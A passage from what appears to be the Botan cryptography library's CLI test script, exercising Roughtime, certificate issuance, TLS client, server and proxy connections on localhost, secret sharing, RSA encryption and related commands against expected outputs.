BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA """, ] request = [ 
"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", ] response = [ "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA", "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA", "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA", ] server_request = request[0] server_response = response[0] test_cli("roughtime", [], expected_stderr=b'Please specify either --servers-file or --host and --pubkey\n') with open(ecosystem, 'w') as f: f.write("Cloudflare-Roughtime ed25519 gD63hSj4ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port)) test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=", "--servers-file=" + ecosystem] , expected_stderr=b'ERROR: Public key does not match!\n') with open(ecosystem, 'w') as f: f.write("Cloudflare-Roughtime ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port)) test_cli("roughtime", [ "--chain-file=", "--servers-file=" + ecosystem] , 
expected_stderr=b'ERROR: Local clock mismatch\n') test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--servers-file=" + ecosystem] , "Cloudflare-Roughtime : UTC 2019-09-12T08:00:11 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[0]: logging.error("unexpected chain") server_request = request[1] server_response = response[1] test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--host=127.0.0.1:" + str(server_port), "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=", "--raw-time"] , "UTC 1568275214691000 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[1]: logging.error("unexpected chain") server_request = request[2] server_response = response[2] test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--host=127.0.0.1:" + str(server_port), "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=", "--max-chain-size=2"] , "UTC 2019-09-12T08:00:42 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[2]: logging.error("unexpected chain") def cli_pk_workfactor_tests(_tmp_dir): test_cli("pk_workfactor", "1024", "80") test_cli("pk_workfactor", "2048", "111") test_cli("pk_workfactor", ["--type=rsa", "512"], "58") test_cli("pk_workfactor", ["--type=dl", "512"], "58") test_cli("pk_workfactor", ["--type=dl_exp", "512"], "128") def cli_dl_group_info_tests(_tmp_dir): dl_output = re.compile('(P|G) = [A-F0-9]+') for bits in [1024, 1536, 2048, 3072, 4096, 6144, 8192]: output = test_cli("dl_group_info", "modp/ietf/%d" % (bits)) lines = output.split('\n') if len(lines) != 2: logging.error('Unexpected output from dl_group_info') for l in lines: if not dl_output.match(l): logging.error('Unexpected output from dl_group_info') def cli_ec_group_info_tests(_tmp_dir): # pylint: disable=line-too-long secp256r1_info = """P = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF A = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC B = 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B N = FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551 G = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5""" secp256r1_pem = """-----BEGIN EC PARAMETERS----- MIHgAgEBMCwGByqGSM49AQECIQD/////AAAAAQAAAAAAAAAAAAAAAP////////// /////zBEBCD/////AAAAAQAAAAAAAAAAAAAAAP///////////////AQgWsY12Ko6 k+ez671VdpiGvGUdBrDMU7D2O848PifSYEsEQQRrF9Hy4SxCR/i85uVjpEDydwN9 gS3rM6D0oTlF2JjClk/jQuL+Gn+bjufrSnwPnhYrzjNXazFezsu2QGg3v1H1AiEA /////wAAAAD//////////7zm+q2nF56E87nKwvxjJVECAQE= -----END EC PARAMETERS-----""" test_cli("ec_group_info", "secp256r1", secp256r1_info) test_cli("ec_group_info", "--pem secp256r1", secp256r1_pem) def cli_cpuid_tests(_tmp_dir): cpuid_output = test_cli("cpuid", []) if not cpuid_output.startswith('CPUID flags:'): logging.error('Unexpected cpuid output "%s"' % (cpuid_output)) flag_re = re.compile('[a-z0-9_]+') flags = cpuid_output[13:].split(' ') for flag in flags: if flag != '' and flag_re.match(flag) is None: logging.error('Unexpected CPUID flag name "%s"' % (flag)) def cli_cc_enc_tests(_tmp_dir): test_cli("cc_encrypt", ["8028028028028029", "pass"], "4308989841607208") test_cli("cc_decrypt", ["4308989841607208", "pass"], "8028028028028027") def cli_cert_issuance_tests(tmp_dir): root_key = os.path.join(tmp_dir, 'root.key') root_crt = os.path.join(tmp_dir, 'root.crt') int_key = 
os.path.join(tmp_dir, 'int.key') int_crt = os.path.join(tmp_dir, 'int.crt') int_csr = os.path.join(tmp_dir, 'int.csr') leaf_key = os.path.join(tmp_dir, 'leaf.key') leaf_crt = os.path.join(tmp_dir, 'leaf.crt') leaf_csr = os.path.join(tmp_dir, 'leaf.csr') test_cli("keygen", ["--params=2048", "--output=" + root_key], "") test_cli("keygen", ["--params=2048", "--output=" + int_key], "") test_cli("keygen", ["--params=2048", "--output=" + leaf_key], "") test_cli("gen_self_signed", [root_key, "Root", "--ca", "--path-limit=2", "--output="+root_crt], "") test_cli("gen_pkcs10", "%s Intermediate --ca --output=%s" % (int_key, int_csr)) test_cli("sign_cert", "%s %s %s --output=%s" % (root_crt, root_key, int_csr, int_crt)) test_cli("gen_pkcs10", "%s Leaf --output=%s" % (leaf_key, leaf_csr)) test_cli("sign_cert", "%s %s %s --output=%s" % (int_crt, int_key, leaf_csr, leaf_crt)) test_cli("cert_verify" "%s %s %s" % (leaf_crt, int_crt, root_crt), "Certificate passes validation checks") def cli_timing_test_tests(_tmp_dir): timing_tests = ["bleichenbacher", "manger", "ecdsa", "ecc_mul", "inverse_mod", "pow_mod", "lucky13sec3", "lucky13sec4sha1", "lucky13sec4sha256", "lucky13sec4sha384"] output_re = re.compile('[0-9]+;[0-9];[0-9]+') for suite in timing_tests: output = test_cli("timing_test", [suite, "--measurement-runs=16", "--warmup-runs=3"], None).split('\n') for line in output: if output_re.match(line) is None: logging.error("Unexpected output in timing_test %s: %s", suite, line) def cli_tls_ciphersuite_tests(_tmp_dir): policies = ['default', 'suiteb_128', 'suiteb_192', 'strict', 'all'] versions = ['tls1.0', 'tls1.1', 'tls1.2'] ciphersuite_re = re.compile('^[A-Z0-9_]+$') for policy in policies: for version in versions: if version != 'tls1.2' and policy != 'all': continue output = test_cli("tls_ciphers", ["--version=" + version, "--policy=" + policy], None).split('\n') for line in output: if ciphersuite_re.match(line) is None: logging.error("Unexpected ciphersuite line %s", line) def cli_asn1_tests(_tmp_dir): input_pem = """-----BEGIN BLOB----- MCACAQUTBnN0cmluZzEGAQH/AgFjBAUAAAAAAAMEAP///w== -----END BLOB------ """ expected = """d= 0, l= 32: SEQUENCE d= 1, l= 1: INTEGER 05 d= 1, l= 6: PRINTABLE STRING string d= 1, l= 6: SET d= 2, l= 1: BOOLEAN true d= 2, l= 1: INTEGER 63 d= 1, l= 5: OCTET STRING 0000000000 d= 1, l= 4: BIT STRING FFFFFF""" test_cli("asn1print", "--pem -", expected, input_pem) def cli_tls_socket_tests(tmp_dir): client_msg = b'Client message %d\n' % (random.randint(0, 2**128)) server_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_server = subprocess.Popen([CLI_PATH, 'tls_server', '--max-clients=1', '--port=%d' % (server_port), server_cert, priv_key], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) tls_client = subprocess.Popen([CLI_PATH, 'tls_client', 'localhost', '--port=%d' % (server_port), '--trusted-cas=%s' % (ca_cert)], 
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) tls_client.stdin.write(client_msg) tls_client.stdin.flush() time.sleep(.5) (stdout, stderr) = tls_client.communicate() if stderr: logging.error("Got unexpected stderr output %s" % (stderr)) if b'Handshake complete' not in stdout: logging.error('Failed to complete handshake: %s' % (stdout)) if client_msg not in stdout: logging.error("Missing client message from stdout %s" % (stdout)) tls_server.communicate() def cli_tls_http_server_tests(tmp_dir): if not check_for_command("tls_http_server"): return try: from http.client import HTTPSConnection except ImportError: try: from httplib import HTTPSConnection except ImportError: return import ssl server_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_server = subprocess.Popen([CLI_PATH, 'tls_http_server', '--max-clients=2', '--port=%d' % (server_port), server_cert, priv_key], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) context = ssl.create_default_context(cafile=ca_cert) conn = HTTPSConnection('localhost', port=server_port, context=context) conn.request("GET", "/") resp = conn.getresponse() if resp.status != 200: logging.error('Unexpected response status %d' % (resp.status)) body = str(resp.read()) if body.find('TLS negotiation with Botan 2.') < 0: logging.error('Unexpected response body') conn.request("POST", "/logout") resp = conn.getresponse() if resp.status != 405: logging.error('Unexpected response status %d' % (resp.status)) if sys.version_info.major >= 3: rc = tls_server.wait(5) # pylint: disable=too-many-function-args else: rc = tls_server.wait() if rc != 0: logging.error("Unexpected return code from https_server %d", rc) def cli_tls_proxy_tests(tmp_dir): # pylint: disable=too-many-locals,too-many-statements if not check_for_command("tls_proxy"): return try: from http.client import HTTPSConnection except ImportError: try: from httplib import HTTPSConnection except ImportError: return try: from http.server import HTTPServer, BaseHTTPRequestHandler except ImportError: try: from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler except ImportError: return import ssl import threading server_port = random_port_number() proxy_port = random_port_number() while server_port == proxy_port: proxy_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_proxy = subprocess.Popen([CLI_PATH, 'tls_proxy', str(proxy_port), '127.0.0.1', str(server_port), 
server_cert, priv_key, '--output=/tmp/proxy.err', '--max-clients=2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) server_response = binascii.hexlify(os.urandom(32)) def run_http_server(): class Handler(BaseHTTPRequestHandler): def do_GET(self): # pylint: disable=invalid-name self.send_response(200) self.end_headers() self.wfile.write(server_response) httpd = HTTPServer(('', server_port), Handler) httpd.serve_forever() http_thread = threading.Thread(target=run_http_server) http_thread.daemon = True http_thread.start() time.sleep(.5) context = ssl.create_default_context(cafile=ca_cert) for _i in range(2): conn = HTTPSConnection('localhost', port=proxy_port, context=context) conn.request("GET", "/") resp = conn.getresponse() if resp.status != 200: logging.error('Unexpected response status %d' % (resp.status)) body = resp.read() if body != server_response: logging.error('Unexpected response from server %s' % (body)) if sys.version_info.major >= 3: rc = tls_proxy.wait(5) # pylint: disable=too-many-function-args else: rc = tls_proxy.wait() if rc != 0: logging.error('Unexpected return code %d', rc) def cli_trust_root_tests(tmp_dir): pem_file = os.path.join(tmp_dir, 'pems') dn_file = os.path.join(tmp_dir, 'dns') test_cli("trust_roots", ['--dn-only', '--output=%s' % (dn_file)], "") dn_re = re.compile('(.+=\".+\")(,.+=\".+\")') for line in open(dn_file): if dn_re.match(line) is None: logging.error("Unexpected DN line %s", line) test_cli("trust_roots", ['--output=%s' % (pem_file)], "") def cli_tss_tests(tmp_dir): data_file = os.path.join(tmp_dir, 'data') exp_hash = "53B3C59276AE30EA7FD882268E80FD96AD80CC9FEB15F9FB940E7C4B5CF80B9E" test_cli("rng", ["32", "--output=%s" % (data_file)], "") test_cli("hash", ["--no-fsname", data_file], exp_hash) m = 3 n = 5 test_cli("tss_split", [str(m), str(n), data_file, "--share-prefix=%s/split" % (tmp_dir)], "") share_files = [] for i in range(1, n+1): share = os.path.join(tmp_dir, "split%d.tss" % (i)) if not os.access(share, os.R_OK): logging.error("Failed to create expected split file %s", share) share_files.append(share) rec5 = os.path.join(tmp_dir, "recovered_5") test_cli("tss_recover", share_files + ["--output=%s" % (rec5)], "") test_cli("hash", ["--no-fsname", rec5], exp_hash) rec4 = os.path.join(tmp_dir, "recovered_4") test_cli("tss_recover", share_files[1:] + ["--output=%s" % (rec4)], "") test_cli("hash", ["--no-fsname", rec4], exp_hash) rec3 = os.path.join(tmp_dir, "recovered_3") test_cli("tss_recover", share_files[2:] + ["--output=%s" % (rec3)], "") test_cli("hash", ["--no-fsname", rec3], exp_hash) rec2 = os.path.join(tmp_dir, "recovered_2") test_cli("tss_recover", share_files[3:] + ["--output=%s" % (rec2)], "", None, b'Error: Insufficient shares to do TSS reconstruction\n') def cli_pk_encrypt_tests(tmp_dir): input_file = os.path.join(tmp_dir, 'input') ctext_file = os.path.join(tmp_dir, 'ctext') recovered_file = os.path.join(tmp_dir, 'recovered') rsa_priv_key = os.path.join(tmp_dir, 'rsa.priv') rsa_pub_key = os.path.join(tmp_dir, 'rsa.pub') test_cli("keygen", ["--algo=RSA", "--provider=base", "--params=2048", "--output=%s" % (rsa_priv_key)], "") key_hash = "72AF3227EF57A728E894D54623EB8E2C0CD11A4A98BF2DF32DB052BF60897873" test_cli("hash", ["--no-fsname", "--algo=SHA-256", rsa_priv_key], key_hash) test_cli("pkcs8", ["--pub-out", "%s/rsa.priv" % (tmp_dir), "--output=%s" % (rsa_pub_key)], "") # Generate a random input file test_cli("rng", ["10", "16", "32", "--output=%s" % (input_file)], "") # Because we used a fixed 
DRBG for each invocation the same ctext is generated each time rng_output_hash = "32F5E7B61357DE8397EFDA1E598379DFD5EE21767BDF4E2A435F05117B836AC6" ctext_hash = "FF1F0EEC2C42DD61D78505C5DF624A19AE6FE2BAB0B8F7D878C7655D54C68FE0" test_cli("hash", ["--no-fsname", "--algo=SHA-256", input_file], rng_output_hash) # Encrypt and verify ciphertext is the expected value test_cli("pk_encrypt", [rsa_pub_key, input_file, "--output=%s" % (ctext_file)], "") test_cli("hash", ["--no-fsname", "--algo=SHA-256", ctext_file], ctext_hash) # Decrypt and verify plaintext is recovered test_cli("pk_decrypt", [rsa_priv_key, ctext_file, "--output=%s" % (recovered_file)], "") test_cli("hash", ["--no-fsname", "--algo=SHA-256", recovered_file], rng_output_hash) def cli_uuid_tests(_tmp_dir): test_cli("uuid", [], "D80F88F6-ADBE-45AC-B10C-3602E67D985B") uuid_re = re.compile(r'[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}') output = test_cli("uuid", []) if uuid_re.match(output) is None: logging.error('Bad uuid output %s' % (output)) def cli_tls_client_hello_tests(_tmp_dir): # pylint: disable=line-too-long chello = "16030100cf010000cb03035b3cf2457b864d7bef2a4b1f84fc3ced2b68d9551f3455ffdd305af277a91bb200003a16b816b716ba16b9cca9cca8c02cc030c02bc02fc0adc0acc024c00ac028c014c023c009c027c013ccaa009f009ec09fc09e006b003900670033010000680000000e000c000009676d61696c2e636f6d000500050100000000000a001a0018001d0017001a0018001b0019001c01000101010201030104000b00020100000d00140012080508040806050106010401050306030403001600000017000000230000ff01000100" output = test_cli("tls_client_hello", ["--hex", "-"], None, chello) output_hash = "8EBFC3205ACFA98461128FE5D081D19254237AF84F7DAF000A3C992C3CF6DE44" test_cli("hash", ["--no-fsname", "--algo=SHA-256", "-"], output_hash, 